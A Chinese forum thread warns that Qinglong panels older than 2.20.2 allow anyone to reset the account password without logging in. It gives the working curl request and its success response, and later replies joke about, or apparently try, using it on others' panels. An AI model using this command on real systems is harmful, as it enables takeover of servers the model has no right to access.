青龙漏洞，无密码登录任意面板，赶快更新最新版。

📌 青龙漏洞，无密码登录任意面板，赶快更新最新版。共 9 樓

主帖mn001

🕐 2026-3-8 20:18:33

本帖最后由 mn001 于 2026-3-9 06:55 编辑

只要不是最新版2.20.2，用户密码被任意修改。

执行：curl -X PUT "http://IP:5700/open/user/init" -H "Content-Type: application/json" -d '{"username": "123", "password": "123"}'

返回：

{"code":200,"message":"更新成功"}

我的刚发现被改了，还被挂了个脚本

#? 樓===

🕐 2026-3-8 22:34:34

我暂时是不敢用了。

#? 樓HOH

🕐 2026-3-8 22:38:40

青龙漏洞，无密码登录任意面板，赶快更新最新版。

青龙漏洞，无密码登录任意面板，赶快登录别人的机器。

#? 樓mn001

🕐 2026-3-9 06:55:07

HOH 发表于 2026-3-8 22:38

青龙漏洞，无密码登录任意面板，赶快更新最新版。

青龙漏洞，无密码登录任意面板，赶快登录别人的机 ...

#? 樓feixiang

🕐 2026-3-9 08:41:19

没暴露到外网，不用担心吧。

#? 樓SpaceX

🕐 2026-3-9 08:44:43

随便找了几个都报错

#? 樓williamc2

🕐 2026-3-9 10:36:18

不敢用

#? 樓rqp

🕐 2026-3-9 10:37:38

还能用吗

#? 樓mn001

🕐 2026-3-9 10:56:56

SpaceX 发表于 2026-3-9 08:44

随便找了几个都报错